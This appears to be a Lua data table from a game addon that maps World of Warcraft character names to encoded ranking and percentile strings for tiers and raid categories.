["Archeal"] = "CM:76/5%",
["Dardardardar"] = "CM:25/0%",
["Sufferring"] = "CB:144/17%UM:336/34%",
["Tanuman"] = "CM:105/9%",
["Loner"] = "RB:399/55%EM:757/82%",
["Uzrbrady"] = "EB:417/75%EM:683/85%",
["Aroundight"] = "RB:492/65%EM:793/85%",
["Wakalakading"] = "RM:593/63%",
["Angelabaobei"] = "UB:234/29%UM:284/32%",
["Necromarc"] = "CB:152/17%EM:799/83%",
["Wryjkid"] = "CM:26/0%",
["Klfaduw"] = "CM:31/1%",
["Onetonwonton"] = "UB:334/45%UM:447/48%",
["Kassandraa"] = "CB:144/17%UM:419/44%",
["Heeya"] = "RB:418/55%EM:850/86%",
["Flanero"] = "CB:143/15%EM:691/87%",
["Dunkables"] = "UB:360/42%EM:643/84%",
["Serade"] = "SB:784/99%SM:1019/99%",
["Misstress"] = "RM:311/63%",
["Kumar"] = "EM:798/81%",
["Daksa"] = "CM:66/10%",
["Anikkdaven"] = "UB:315/42%EM:760/81%",
["Lgx"] = "UB:284/34%UM:452/48%",
["Zafkiel"] = "CB:66/7%UM:261/25%",
["Asurax"] = "UB:394/49%UM:430/45%",
["Gurulin"] = "EB:710/94%LM:933/96%",
["Soulm"] = "UB:336/45%RM:659/72%",
["Worstmage"] = "RB:443/57%RM:759/74%",
["Skibbitypaps"] = "CM:159/16%",
["Wetnwild"] = "EM:886/90%",
["Popnsqueezeu"] = "UB:379/49%RM:651/69%",
["Kharno"] = "CM:226/21%",
["Lgadajfg"] = "CM:115/11%",
["Derpshot"] = "CB:42/4%UM:426/44%",
["Caplock"] = "UB:203/25%RM:684/66%",
["Holyguacamol"] = "RB:504/70%LM:944/97%",
["Pekky"] = "UB:286/37%EM:868/91%",
["Hhorse"] = "RB:554/74%EM:886/92%",
["Phaino"] = "UB:390/47%RM:678/72%",
["Valaj"] = "CM:188/17%",
["Vkazas"] = "EB:502/81%EM:605/81%",
["Vendim"] = "RB:497/65%EM:785/78%",
["Twazo"] = "RB:555/74%LM:959/96%",
["Meeko"] = "CB:55/6%UM:325/33%",
["Smevz"] = "CT:34/9%CB:57/14%UM:440/45%",
["Ringo"] = "UB:358/46%RM:568/60%",
["Beefrocket"] = "UT:162/25%EB:601/76%EM:922/92%",
["Warmsqueezy"] = "CB:61/7%CM:213/22%",
["Kragnar"] = "RB:308/51%RM:478/69%",
["Ampersamm"] = "UB:252/32%RM:458/50%",
["Zeln"] = "EM:608/77%",
["Gzxiaojiejie"] = "CB:161/20%RM:652/71%",
["Mufflerman"] = "EB:605/83%EM:884/92%",
["Sojo"] = "RB:485/67%EM:833/88%",
["Isucrealbad"] = "CB:185/23%EM:759/80%",
["Dixiewreckt"] = "RB:457/57%RM:699/74%",
["Devantos"] = "RB:461/59%RM:705/74%",
["Gnomeosexual"] = "RB:438/58%RM:627/69%",
["Bamboody"] = "UB:266/34%UM:356/38%",
["Afghan"] = "RB:383/50%RM:620/68%",
["Mykurwa"] = "CB:30/2%EM:789/76%",
["Reznite"] = "EB:560/78%RM:603/67%",
["Igankppl"] = "CB:181/22%UM:437/46%",
["Worstdruid"] = "RB:489/67%EM:841/89%",
["Fheruii"] = "CM:162/17%",
["Notkorean"] = "UM:393/40%",
["Tado"] = "CB:32/2%UM:436/44%",
["Redsignal"] = "EM:813/90%",
["Øø"] = "EM:923/93%",
["Notgointocit"] = "CB:146/17%RM:335/62%",
["Mandles"] = "RB:447/62%EM:792/85%",
["Sophita"] = "UB:390/47%EM:813/85%",
["Girall"] = "CM:29/1%",
["Daishou"] = "RB:494/62%RM:646/69%",
["Aiirenn"] = "UB:331/38%RM:666/60%",
["Krazykevin"] = "UB:195/46%RM:589/74%",
["Nallek"] = "CM:140/14%",
["Thotasaurus"] = "RB:482/63%EM:781/76%",
["Widdlepanduh"] = "UB:318/42%UM:338/35%",
["Resistal"] = "CM:248/24%",
["Twixie"] = "RB:546/70%EM:906/90%",
["Wafers"] = "EB:713/93%SM:1008/99%",
["Skitz"] = "CB:160/20%RM:536/59%",
["Almarian"] = "RB:476/66%EM:741/79%",
["Lovesmoo"] = "RT:188/66%RB:453/56%RM:660/70%",
["Malefactor"] = "CB:79/9%RM:593/58%",
["Deohte"] = "CM:136/14%",
["Toll"] = "CB:97/11%RM:650/69%",
["Lowsodium"] = "EB:646/84%EM:689/75%",
["Ab"] = "RB:419/57%EM:824/87%",
["Shortwick"] = "CB:156/18%RM:622/66%",
["Pelko"] = "RB:458/63%RM:535/58%",
["Kestry"] = "RB:477/66%EM:778/83%",
["Feek"] = "UB:323/42%EM:787/80%",
["Sweetïe"] = "RB:507/70%EM:808/87%",
["Kabraxis"] = "EB:647/82%LM:973/97%",
["Vynarian"] = "EB:715/90%SM:1012/99%",
["Mongoose"] = "RT:383/51%EB:468/85%EM:761/80%",
["Mojisan"] = "RT:548/73%RB:489/70%RM:395/51%",
["Gugrandma"] = "ET:588/78%UB:314/44%UM:375/49%",
["Flychong"] = "UT:342/45%UB:249/32%RM:446/50%",
["Tonebislier"] = "UT:320/42%RB:398/54%RM:586/65%",
["Reklinz"] = "RM:243/63%",
["Anmry"] = "ET:699/90%EB:650/88%EM:827/87%",
["Leorick"] = "RT:524/67%EB:704/94%RM:509/59%",
["Bargle"] = "CT:35/10%CM:71/8%",
["Holachica"] = "CT:186/21%CB:188/22%CM:132/15%",
["Rolav"] = "RT:498/68%RB:523/71%RM:671/73%",
["Curvedshot"] = "RT:510/69%EB:663/86%EM:773/82%",
["Omnific"] = "CT:0/0%EB:558/75%RM:622/68%",
["Ravni"] = "ET:703/91%LB:777/97%LM:980/98%",
["Sucit"] = "UT:303/42%RB:411/53%RM:671/74%",
["Frozenfinger"] = "UT:118/46%EB:372/75%EM:692/92%",
["Boofsaver"] = "UT:218/28%RB:432/58%RM:195/51%",
["Shadios"] = "RM:622/65%",
["Nuttyshot"] = "RT:162/59%CB:29/3%UM:230/26%",
["Masboy"] = "CM:158/21%",
["Homegirl"] = "ST:783/99%LB:741/98%SM:934/99%",
["Gutrictord"] = "RB:275/61%",
["Rendlord"] = "UT:108/39%CB:144/18%UM:411/47%",
["Dstarion"] = "ET:595/76%LB:717/95%SM:976/99%",
["Stiphlerr"] = "ET:600/89%EB:599/87%EM:810/91%",
["Skryt"] = "ET:732/94%EB:576/81%EM:668/93%",
["Meruke"] = "CT:81/15%",
["Endest"] = "CB:153/20%UM:79/29%",
["Ditzygirl"] = "RM:337/60%",
["Onash"] = "UT:360/47%EB:364/78%UM:131/44%",
["Shamberder"] = "UM:101/41%",
["Maojin"] = "UB:332/41%",
["Xiaochuichui"] = "LT:485/95%EB:482/89%EM:750/84%",
["Lawinbee"] = "UB:123/33%RM:260/60%",
["Byeow"] = "RB:390/52%CM:160/20%",
["Schopenhau"] = "EB:624/86%EM:762/86%",
["Ogbake"] = "EB:607/84%EM:679/78%",
["Asuraa"] = "CT:39/6%RB:201/58%CM:24/13%",
["Wge"] = "CB:35/2%",
["Tirefire"] = "RT:356/73%EB:657/90%EM:492/85%",
["Calmadios"] = "EB:701/89%RM:571/64%",
["Pusxise"] = "UT:247/31%UB:157/40%RM:467/55%",
["Dirtyscrag"] = "ST:798/99%SB:796/99%SM:1038/99%",
["Plaguexp"] = "ET:697/90%EB:698/89%EM:770/83%",
["Urbzalag"] = "CM:13/2%",
["Gandee"] = "CT:32/7%UB:234/30%CM:96/12%",
["Lovemj"] = "CM:31/2%",
["Noheart"] = "UM:398/47%",
["Otfruitt"] = "CB:68/18%CM:29/1%",
["Uyut"] = "UT:254/30%UB:245/32%RM:516/60%",
["Icutv"] = "UB:121/30%UM:116/34%",
["Nazrag"] = "UM:143/41%",
["Haris"] = "CT:126/13%EB:629/87%RM:612/70%",
["Eatgrass"] = "UT:112/43%EB:487/86%RM:544/61%",
["Gecky"] = "RT:514/64%RB:493/71%RM:643/74%",
["Glorfy"] = "RM:451/53%",
["Blütpflücker"] = "EM:645/86%",
["Fadedmemory"] = "CM:47/16%",
["Waddafak"] = "CB:70/19%RM:541/63%",
["Shadowfäx"] = "CM:168/23%",
["Orileys"] = "UB:238/31%RM:618/72%",
["Popoi"] = "CB:164/20%EM:782/76%",
["Icedmilk"] = "EB:537/75%EM:663/77%",
["Snicklfritz"] = "CM:82/11%",
["Fatalcupcake"] = "UM:53/29%",
["Bendyaover"] = "CB:91/22%EM:491/79%",
["Myrica"] = "LT:744/95%SB:753/99%EM:714/76%",
["Longxhorn"] = "CT:70/10%RB:295/68%RM:539/64%",
["Rexiaoyi"] = "ET:406/92%EB:609/94%CM:181/24%",
["Brokenheart"] = "CT:88/8%RB:429/60%RM:214/55%",
["Luneth"] = "LT:661/98%EB:631/85%EM:778/84%",
["Mellegebi"] = "CM:33/10%",
["Shynn"] = "ET:717/91%EB:691/88%RM:692/74%",
["Adoukken"] = "CB:52/5%CM:54/6%",
["Flyticket"] = "CT:75/9%EB:546/76%EM:746/86%",
["Lgz"] = "RB:414/53%EM:830/81%",
["Ichop"] = "RT:206/70%RB:521/69%UM:334/38%",
["Nopesi"] = "ET:722/92%EB:734/93%EM:875/92%",
["Phenik"] = "CT:104/18%CB:146/17%CM:72/10%",
["Behkho"] = "UB:192/39%UM:191/49%",
["Darkbitt"] = "RT:450/59%RB:558/74%RM:595/64%",
["Bõbfromsales"] = "LT:746/95%EB:723/91%EM:878/92%",
["Sapperdealer"] = "RT:493/67%EB:744/94%EM:866/91%",
["Faerlyasian"] = "UT:344/45%RB:480/65%EM:825/87%",
["Numbingg"] = "CT:150/24%RB:445/62%EM:746/84%",
["Recke"] = "LT:628/98%LB:753/95%LM:956/97%",
["Hiddenboner"] = "UT:290/37%UB:366/48%RM:266/58%",
["Peeheeheehe"] = "RT:393/54%EB:701/89%EM:682/75%",
["Shift"] = "EB:553/87%",
["Holytomato"] = "CT:64/5%CB:38/6%",
["Ayker"] = "RM:627/73%",
["Cuzzi"] = "CM:29/6%",
["Punchie"] = "RT:525/68%EB:602/84%EM:795/88%",
["Manola"] = "CB:165/21%RM:554/61%",
["Beansupreme"] = "EB:639/83%EM:851/89%",
["Dotsfordaddy"] = "UB:188/46%RM:455/50%",
["Yukayo"] = "CM:60/19%",
["Jawari"] = "RM:207/55%",
["Obituary"] = "UT:372/46%RB:427/61%EM:741/82%",
["Cuppers"] = "ET:666/87%EB:572/75%CM:166/21%",
["Reveries"] = "RT:226/66%EB:521/75%EM:781/88%",
["Thatdwarf"] = "CT:194/23%EB:387/80%RM:481/57%",
["Brudder"] = "UT:82/30%RB:476/64%RM:570/62%",
["Metalmaster"] = "RT:210/67%EB:593/78%EM:813/84%",
["Sinhero"] = "CM:71/11%",
["Ziggÿ"] = "RT:150/53%RB:453/61%",
["Vegaz"] = "CT:29/11%CB:103/11%UM:91/47%",
["Madmardigann"] = "CT:26/0%CB:88/20%UM:72/38%",
["Drunkshot"] = "UT:100/39%",
["Stoplight"] = "ST:814/99%SB:867/99%SM:1006/99%",
["Cominforu"] = "ET:592/76%EB:530/75%RM:581/67%",
["Mayyday"] = "UT:157/49%RB:467/67%CM:119/13%",
["Avilover"] = "ET:599/76%EB:545/78%RM:525/62%",
["Coldplayy"] = "ET:387/93%EB:523/93%EM:521/86%",
["Prospider"] = "RT:166/60%EB:668/85%EM:724/86%",
["Copbikergodx"] = "LT:760/96%EB:730/93%RM:335/68%",
["Donkers"] = "ET:570/77%EB:681/88%",
["Phtevenn"] = "ET:313/83%EB:652/89%LM:918/95%",
["Daga"] = "CT:76/14%RB:455/61%",
["Nullifer"] = "ST:794/99%LB:780/97%LM:957/96%",
["Casketsnap"] = "ET:720/88%EB:610/86%LM:912/95%",
["Thedoctorjaz"] = "ET:650/81%LB:722/96%EM:789/86%",
["Prettychill"] = "ST:733/99%LB:753/97%LM:967/97%",
["Exorcyzm"] = "RT:498/63%EB:623/86%EM:868/92%",
["Avidkiller"] = "ST:774/99%SB:810/99%LM:958/97%",
["Chubuz"] = "UT:275/33%UB:327/44%UM:148/43%",
["Demek"] = "EB:571/75%RM:665/72%",
["Felinlove"] = "EB:591/78%",
["Beeteam"] = "UM:146/42%",
["Sweatyafro"] = "CM:77/11%",
["Wrecklinball"] = "UM:145/47%",
["Nyxilis"] = "CB:31/2%UM:135/41%",
["Snakeyes"] = "RB:457/62%CM:151/18%",
["Nielane"] = "CM:133/14%",
["Suzuran"] = "RB:266/63%RM:536/63%",
["Rockyrogue"] = "UB:253/32%UM:435/49%",
["Poletwister"] = "RT:220/64%LB:683/98%RM:440/52%",
["Bruticus"] = "UM:76/26%",
["Kataracts"] = "ET:557/75%EB:530/89%EM:504/82%",
["Niulailai"] = "RT:534/68%EB:556/79%EM:688/79%",
["Kunuckles"] = "RT:378/50%UB:123/30%RM:468/53%",
["Justdjr"] = "LT:830/96%LB:773/98%LM:934/96%",
["Chritopher"] = "CB:27/1%CM:10/1%",
["Mamamirx"] = "CT:27/0%CB:76/15%UM:258/29%",
["Jaraj"] = "ET:399/94%LB:691/97%LM:908/95%",
["Kaisx"] = "ET:731/93%EB:737/93%RM:579/62%",
["Nubcraft"] = "ST:935/99%EB:681/93%LM:889/95%",
["Remisbis"] = "LT:744/95%LB:757/95%EM:759/82%",
["Bigyork"] = "RB:450/63%RM:580/68%",
["Steeroids"] = "RB:288/57%EM:398/81%",
["Karyen"] = "EB:568/75%RM:581/64%",
["Jackmarrow"] = "CM:26/0%",
["Edss"] = "UT:388/48%EB:537/93%EM:754/85%",
["Crazylegs"] = "RM:491/55%",
["Livelucky"] = "ET:692/89%LB:772/97%RM:649/70%",
["Ghostwolf"] = "CB:38/2%",
["Coenshunter"] = "UB:171/43%UM:223/25%",
["Meshkarn"] = "ET:354/83%EB:514/85%EM:396/86%",
["Randabohay"] = "UM:225/28%",
["Namemyrogue"] = "CM:112/14%",
["Fathealz"] = "RM:254/58%",
["Goser"] = "CT:0/0%RB:475/64%RM:543/60%",
["Whowee"] = "UB:147/38%RM:299/68%",
["Sparc"] = "CT:29/1%UB:231/29%RM:526/62%",
["Lilgenocyde"] = "CB:99/13%UM:235/29%",
["Deepsteel"] = "UT:286/40%RB:448/58%RM:500/57%",
["Opdrood"] = "ST:912/99%LB:678/98%EM:818/90%",
["Nahlis"] = "UM:381/45%",
["Zuxx"] = "RT:485/64%EB:708/94%RM:488/61%",
["Onemorelight"] = "CT:62/5%CB:103/24%UM:381/45%",
["Onoakira"] = "CM:64/24%",
["Falilin"] = "RT:404/55%RB:380/51%EM:524/84%",
["Gravessin"] = "RT:483/63%RB:493/66%EM:539/83%",
["Justthis"] = "ET:697/94%LB:713/96%RM:519/61%",
["Supersomz"] = "RT:449/59%LB:726/95%EM:836/91%",
["Endgametank"] = "ET:572/83%EB:708/93%EM:640/84%",
["Shortredhair"] = "UT:343/43%RB:320/69%RM:344/71%",
["Stainedclass"] = "LT:781/98%SB:782/99%SM:1007/99%",
["Thehiv"] = "RM:680/66%",
["Fairybread"] = "RT:49/64%RB:146/57%",
["Chargecow"] = "UB:261/30%UM:315/36%",
["Katzilla"] = "UT:230/27%RB:460/66%UM:245/28%",
["Edgemastery"] = "RT:187/65%RB:283/62%UM:149/42%",
["Fear"] = "LT:641/98%EB:564/91%EM:894/90%",
["Zorde"] = "UT:245/35%EB:569/75%EM:719/78%",
["Qroot"] = "CT:67/13%CB:153/16%UM:320/37%",
["Riotdruid"] = "RB:518/74%",
["Parsival"] = "ET:679/88%EB:739/93%",
["Wisky"] = "RB:477/67%UM:145/47%",
["Ravir"] = "RT:214/69%EB:658/85%EM:614/87%",
["Ræq"] = "RB:472/63%RM:241/54%",
["Return"] = "EB:744/94%EM:874/86%",
["Ashikata"] = "UM:139/43%",
["Bengbengcha"] = "RT:384/50%RB:357/72%RM:450/51%",
["Kushalot"] = "UM:343/42%",
["Pharmacon"] = "CT:90/9%RB:430/62%UM:369/44%",
["Artourb"] = "UB:293/35%UM:130/39%",
["Gearthmother"] = "EB:335/76%RM:189/59%",
["Girtholomeuu"] = "UM:101/38%",
["Shocksalot"] = "UM:58/37%",
["Nolmahn"] = "CM:32/2%",
["Coletta"] = "CB:84/10%RM:313/63%",
["Fosbot"] = "UM:87/26%",
["Cutewicky"] = "ET:233/75%EB:581/82%EM:684/86%",
["Windssor"] = "ET:341/86%RB:299/65%CM:149/16%",
["Sanist"] = "LT:615/98%SB:776/99%EM:851/90%",
["Bernicev"] = "CT:85/8%UB:127/31%CM:106/11%",
["Juyck"] = "LT:751/96%LB:727/95%LM:961/97%",
["Vlabor"] = "ET:279/80%EB:647/84%LM:812/96%",
["Levïathon"] = "RT:492/65%EB:719/91%RM:654/70%",
["Biznitch"] = "CM:119/17%",
["Bigdeall"] = "LT:870/98%EB:505/91%EM:873/94%",
["Cicilla"] = "RT:530/71%UB:340/48%",
["Midgetician"] = "ET:714/92%EB:683/92%LM:937/96%",
["Eiwoca"] = "ET:268/80%EB:599/94%EM:747/78%",
["Fripp"] = "CB:33/5%UM:337/40%",
["Grieftolive"] = "RT:417/54%EB:677/87%EM:832/87%",
["Gnomebasher"] = "LT:752/95%EB:692/88%EM:875/92%",
["Naidie"] = "ET:434/93%EB:639/83%RM:631/68%",
["Slipshady"] = "RT:504/66%EB:565/80%EM:659/76%",
["Highßoltage"] = "CT:119/12%RB:326/61%EM:329/76%",
["Tratvis"] = "RT:559/74%EB:566/75%RM:531/58%",
["Krossair"] = "RB:497/68%UM:166/48%",
["Bitethebelt"] = "UT:319/44%RB:554/73%RM:615/69%",
["Sannas"] = "CB:178/23%UM:96/29%",
["Nephillium"] = "UT:173/36%RB:451/72%RM:251/55%",
["Luciole"] = "RB:512/74%UM:416/49%",
["Boxform"] = "RB:367/52%EM:642/92%",
["Prplsaursrex"] = "EB:649/84%EM:721/79%",
["Chokkymilk"] = "UB:153/39%UM:98/33%",
["Salsuhdip"] = "CT:155/24%RB:429/56%UM:294/34%",
["Callmebetch"] = "RB:486/68%EM:648/75%",
["Trudy"] = "UM:319/37%",
["Andiloveher"] = "UB:89/25%UM:303/36%",
["Stunn"] = "ET:673/85%EB:594/85%RM:557/65%",
["Hoebiden"] = "EB:388/82%UM:415/49%",
["Matatoros"] = "RT:390/63%UB:143/47%EM:544/79%",
["Barearms"] = "EB:576/88%",
["Azraeljr"] = "ET:641/84%EB:640/82%EM:784/84%",
["Rtw"] = "ET:634/84%EB:699/89%RM:525/60%",
["Kigga"] = "RT:527/71%RB:552/73%RM:661/73%",
["Pinkmoo"] = "ET:432/78%EB:579/84%EM:593/78%",
["Kîng"] = "ET:354/90%LB:750/95%LM:912/96%",
["Chisely"] = "ET:603/93%EB:554/87%EM:343/82%",
["Solaris"] = "ET:374/92%LB:725/95%EM:869/91%",
["Ikthor"] = "LT:768/97%LB:780/97%LM:899/96%",
["Machoburrito"] = "ET:591/79%LB:703/97%EM:802/86%",
["Dabausse"] = "LT:777/98%EB:679/91%LM:956/96%",
["Tropey"] = "CT:202/23%RB:327/71%UM:360/43%",
["Snorkeling"] = "LT:719/97%LB:738/97%EM:857/94%",
["Uperr"] = "ET:674/85%EB:710/94%EM:876/92%",
["Sneknstab"] = "ET:686/88%EB:734/93%EM:842/88%",
["Ggez"] = "LT:753/95%LB:778/97%LM:958/97%",
["Arlado"] = "ET:708/87%EB:655/88%EM:900/93%",
["Bubbleless"] = "ET:527/79%UB:376/48%UM:353/40%",
["Gutterbrain"] = "CT:161/20%RB:320/73%RM:623/72%",
["Doyouevntry"] = "RB:462/63%RM:520/56%",
["Captinsano"] = "CT:54/11%CB:187/21%UM:284/33%",
["Tigerswood"] = "ET:700/90%EB:642/84%EM:829/87%",
["Jobertrordan"] = "CT:151/24%UB:363/45%EM:580/87%",
["Sleepwalk"] = "CT:38/15%UB:163/39%RM:352/70%",
["Hyumin"] = "RM:177/53%",
["Ayanii"] = "LT:744/98%SB:813/99%LM:936/96%",
["Leoric"] = "CT:185/21%CB:96/21%UM:339/39%",
["Manapause"] = "CB:115/11%CM:152/17%",
["Dasini"] = "UT:258/33%RB:510/73%RM:216/60%",
["Ruggard"] = "UB:349/47%",
["Petruid"] = "RB:246/59%RM:504/60%",
["Spindos"] = "ET:624/82%RB:564/74%RM:391/68%",
["Demote"] = "RT:455/62%EB:711/90%EM:584/87%",
["Toicyitburns"] = "CT:61/11%CB:35/3%UM:217/27%",
["Lawbreaker"] = "ET:566/76%EB:453/83%RM:627/70%",
["Henchi"] = "CM:56/7%",
["Orkhewinfary"] = "RT:210/61%UB:341/48%RM:467/55%",
["Hovs"] = "CB:64/17%RM:545/64%",
["Amazingmaze"] = "CB:29/1%UM:206/25%",
["Ryinst"] = "CB:31/3%UM:73/28%",
["Senzubeanis"] = "RT:202/60%EB:526/75%EM:779/86%",
["Anduinswoyer"] = "ET:735/94%EB:718/91%EM:630/89%",
["Kwiz"] = "UM:333/37%",
["Polly"] = "UM:160/46%",
["Foxyminx"] = "EM:739/80%",
["Legendaryhoe"] = "UT:29/32%RB:237/54%RM:327/59%",
["Crackles"] = "ET:364/92%LB:756/95%EM:844/89%",
["Dautism"] = "RB:505/71%CM:156/21%",
["Prezmafia"] = "CM:38/3%",
["Raken"] = "ET:722/92%EB:726/92%EM:725/79%",
["Nine"] = "CM:152/16%",
["Chendamoomoo"] = "ET:628/88%RB:228/73%EM:746/91%",
["Ucuu"] = "CT:38/4%",
["Discogoating"] = "ET:678/88%EB:722/92%EM:865/90%",
["Badelante"] = "RT:396/52%",
["Cheerioss"] = "ET:518/84%EB:610/88%LM:720/95%",
["Graveeyx"] = "RT:147/54%EB:404/78%EM:507/82%",
["Ypz"] = "UB:179/48%UM:267/32%",
["Clostridium"] = "UB:310/41%",
["Zuco"] = "UM:130/41%",
["Deathbolt"] = "CM:89/12%",
["Deadaf"] = "ET:295/83%EB:397/77%UM:188/47%",
["Atjamori"] = "RT:444/55%RB:293/68%EM:763/84%",
["Moistchimp"] = "CB:4/0%UM:406/46%",
["Burdbrain"] = "RT:226/69%EB:584/82%RM:601/70%",
["Wafflecones"] = "CB:4/0%CM:68/9%",
["Boluskita"] = "UM:338/39%",
["Tommraper"] = "RB:198/50%RM:461/54%",
["Ragnus"] = "UM:392/44%",
["Miìra"] = "ET:390/92%EB:704/89%RM:424/74%",
["Bloodbörne"] = "UT:251/46%RB:404/52%RM:311/61%",
["Toothtiny"] = "ET:758/92%LB:709/95%LM:890/95%",
["Autocrate"] = "ET:723/93%EB:707/90%EM:897/93%",
["Ochre"] = "ET:732/89%EB:612/85%EM:683/77%",
["Sublýme"] = "ET:580/77%EB:740/93%EM:844/89%",
["Littydab"] = "RB:357/66%",
["Itchysack"] = "EB:618/80%EM:750/81%",
["Galsworthy"] = "CB:128/17%UM:149/48%",
["Tp"] = "RT:495/65%EB:709/90%EM:821/85%",
["Izzyy"] = "CT:13/4%UB:261/34%UM:410/46%",
["Cooi"] = "CM:8/1%",
["Europoor"] = "CB:54/5%UM:286/33%",
["Katesquirts"] = "CT:134/17%CB:137/16%",
["Catharses"] = "CT:0/3%CB:65/6%CM:24/5%",
["Illmatic"] = "CB:72/9%UM:102/38%",
["Chargingtime"] = "ET:674/88%EB:494/87%EM:677/75%",
["Jibexecute"] = "EB:653/84%UM:185/49%",
["Inevafreeze"] = "CM:29/1%",
["Stevefrenchi"] = "UM:377/45%",
["Faerlyazn"] = "UT:265/35%RB:455/65%RM:583/68%",
["Blackoutplay"] = "ET:692/86%EB:587/83%RM:495/58%",
["Archinfury"] = "RT:388/53%EB:582/76%UM:204/39%",
["Mercyheals"] = "CT:41/2%EB:539/76%EM:741/83%",
["Kreamfilling"] = "EB:674/86%EM:828/87%",
["Manbearjoo"] = "ET:374/84%EB:490/82%EM:605/83%",
["Neckrotic"] = "ET:289/81%RB:255/58%RM:533/58%",
["Realist"] = "RT:204/62%RB:225/54%RM:197/51%",
["Blkmlk"] = "UB:199/26%CM:130/18%",
["Jibberino"] = "UM:408/46%",
["Arigatou"] = "LT:781/98%LB:762/97%EM:876/93%",
["Leontra"] = "CT:38/7%CB:126/13%CM:176/20%",
["Ilikill"] = "CT:50/16%RB:432/58%RM:665/72%",
["Scourger"] = "CT:11/13%CB:96/9%RM:192/51%",
["Youngxueqiu"] = "LT:738/96%EB:595/89%EM:683/87%",
["Rtk"] = "UT:358/49%UB:206/27%CM:102/12%",
["Eriiette"] = "CT:0/0%UB:181/48%UM:190/25%",
["Sipip"] = "RB:512/73%UM:358/41%",
["Aletter"] = "RT:523/69%UB:118/29%",
["Mhgfda"] = "CM:61/23%",
["Zalzo"] = "RB:383/54%RM:440/50%",
["Denbts"] = "RT:563/73%EB:567/79%EM:815/88%",
["Dejamoon"] = "ET:479/81%RB:442/74%",
["Gearbeggar"] = "RT:323/69%EB:495/91%EM:798/90%",
["Dotslol"] = "RB:457/62%RM:624/67%",
["Wildhealz"] = "CB:155/17%",
["Ddangle"] = "CT:129/17%RB:162/60%",
["Paiload"] = "RM:200/57%",
["Easius"] = "RT:207/62%RB:419/60%RM:301/64%",
["Clik"] = "ET:670/88%EB:538/93%EM:763/87%",
["Whydps"] = "CT:173/20%CM:48/3%",
["Eazzy"] = "ET:707/91%EB:648/83%CM:156/19%",
["Yblocc"] = "LT:522/95%EB:497/90%",
["Mezzod"] = "ET:780/93%LB:698/95%LM:896/96%",
["Poolsidemage"] = "RT:408/54%UB:222/29%CM:62/9%",
["Hotelroom"] = "UB:355/45%RM:443/51%",
["Uthc"] = "RT:182/62%RB:481/64%RM:462/52%",
["Milkmerough"] = "CB:73/17%CM:206/22%",
["Painkillers"] = "CM:135/17%",
["Zhananfeng"] = "ET:344/90%EB:642/83%RM:670/74%",
["Sneakhard"] = "UB:137/33%UM:135/37%",
["Budgunderson"] = "CT:32/8%CB:193/24%UM:343/38%",
["Leebeiby"] = "RT:513/67%EB:619/81%RM:602/66%",
["Haohighyo"] = "CT:65/5%CB:91/21%CM:5/7%",
["Adultfilms"] = "CT:45/4%CB:77/9%CM:201/24%",
["Takisbak"] = "RT:223/70%RB:410/56%UM:429/48%",
["Jibenius"] = "ET:676/85%LB:725/96%EM:811/89%",
["Dreahd"] = "RT:501/67%EB:655/89%EM:820/90%",
["Neruh"] = "UT:21/30%RM:224/56%",
["Jteet"] = "RT:228/67%RB:273/57%RM:475/65%",
["Rexclona"] = "UT:76/29%CB:125/16%UM:249/31%",
["Citysushi"] = "ET:564/75%EB:399/78%RM:592/64%",
["Ronnythebear"] = "ET:253/79%EB:458/75%UM:76/41%",
["Ducket"] = "LT:653/98%EB:540/93%EM:418/78%",
["Mammora"] = "CM:49/18%",
["Buttercakez"] = "ET:706/91%EB:692/89%EM:849/89%",
["Dezadus"] = "ET:569/76%EB:648/83%EM:810/86%",
["Rouqil"] = "UT:302/39%EB:658/85%UM:429/49%",
["Pepperidge"] = "ET:737/91%EB:533/76%EM:672/76%",
["Malvir"] = "RT:400/52%EB:408/78%",
["Letmint"] = "CT:98/12%CB:67/16%UM:361/38%",
["Phate"] = "ET:718/92%EB:725/92%LM:916/95%",
["Falkkoon"] = "RT:528/72%EB:658/84%RM:495/57%",
["Ásta"] = "ET:327/85%EB:525/92%EM:630/91%",
["Sourdoughtoe"] = "UT:344/46%EB:658/85%EM:853/89%",
["Zeitmhong"] = "UT:245/32%RB:515/70%UM:444/49%",
["Chendarena"] = "ET:256/79%EB:531/89%EM:793/84%",
["Miniyork"] = "ET:696/90%EB:672/91%",
["Neemorrage"] = "RT:499/68%RB:503/66%UM:378/43%",
["Caltab"] = "RB:416/55%",
["Jujuguo"] = "ET:603/80%EB:574/75%RM:645/72%",
["Bolu"] = "EB:621/85%EM:658/76%",
["Farvá"] = "UM:221/26%",
["Blaksife"] = "CB:186/22%",
["Gothbaby"] = "UT:342/45%EB:649/84%RM:669/72%",
["Shrader"] = "EB:602/79%RM:625/70%",
["Shelwen"] = "EB:518/75%EM:664/77%",
["Exycute"] = "CT:33/13%EB:718/91%EM:781/84%",
["Pisco"] = "RM:231/57%",
["Idoykodompol"] = "UM:120/40%",
["Syedpeer"] = "UB:118/33%UM:96/36%",
["Bowtard"] = "UM:102/33%",
["Phewpewphew"] = "UB:207/27%RM:293/66%",
["Moonshíne"] = "CB:60/13%RM:592/65%",
["Cloudconectd"] = "ET:610/81%EB:646/84%EM:806/85%",
["Shadowlotis"] = "RM:424/66%",
["Ktpriest"] = "RM:543/64%",
["Beefyyowzer"] = "UB:355/45%CM:186/23%",
["Shackwave"] = "RT:511/64%EB:604/84%RM:643/74%",
["Backyard"] = "ET:605/80%EB:680/87%EM:907/94%",
["Proricer"] = "ET:643/84%EB:559/94%EM:843/92%",
["Terrah"] = "RT:491/68%EB:690/88%",
["Awasajig"] = "CB:63/7%CM:78/10%",
["Ezwarm"] = "UT:131/49%EB:699/89%EM:765/83%",
["Fate"] = "UB:297/40%UM:339/40%",
["Justgun"] = "ET:577/76%EB:662/85%EM:456/79%",
["Starcrack"] = "UT:256/33%EB:705/90%EM:801/85%",
["Edwik"] = "ET:618/82%EB:730/92%EM:840/88%",
["Dumblechode"] = "CT:127/14%CB:26/0%",
["Pokes"] = "RT:478/63%UB:99/25%",
["Alxs"] = "CT:75/22%UB:203/25%",
["Concede"] = "RT:468/65%EB:576/76%RM:526/60%",
["Coolflips"] = "CT:0/0%CB:148/18%RM:569/63%",
["Oceanwater"] = "CT:81/8%CB:82/21%UM:268/31%",
["Trickyx"] = "ET:283/79%EB:642/89%LM:907/96%",
["Froot"] = "UT:77/36%UM:259/35%",
["Sonmage"] = "RT:391/51%RB:387/56%RM:216/60%",
["Shambulancee"] = "CT:28/0%CB:59/4%RM:288/64%",
["Vojjin"] = "UT:300/36%CB:110/11%",
["Phluffi"] = "CT:98/17%UB:173/36%RM:335/63%",
["Atarum"] = "RM:270/67%",
